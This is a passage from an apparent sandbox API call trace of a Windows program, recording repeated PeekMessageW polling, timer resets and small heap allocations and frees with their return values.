out: lpMsg=0x7dfb8c) returned 0 [0134.769] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.769] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.769] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.769] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.769] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.769] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.769] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.770] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.770] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.770] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.770] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.770] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.770] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.770] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.770] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.770] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.771] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.771] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.771] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.771] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.771] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.771] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.771] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.771] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.771] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.771] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.772] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0134.934] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0134.934] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0134.934] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0134.934] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0135.041] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0135.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0135.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0135.042] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0135.042] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0135.042] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0135.042] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.043] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0135.043] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.043] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.043] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.043] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.043] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0135.043] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0135.043] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.043] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0135.043] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.043] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0135.043] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.043] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.043] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.043] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.043] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0135.043] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0135.043] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.044] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0135.044] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.044] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.044] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.044] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0135.044] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.044] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0135.044] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.044] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.044] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0135.045] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0135.045] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0135.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0135.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0135.046] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0135.046] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0135.046] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0135.046] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.046] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.047] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.047] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.047] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0135.047] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.047] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0135.047] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.047] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.047] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.047] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0135.048] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0135.048] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0135.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0135.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0135.048] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0135.048] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0135.056] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0135.056] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0135.056] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0135.057] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0135.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0135.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0135.057] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0135.057] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0135.058] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0135.058] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0135.058] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0135.058] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0135.059] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 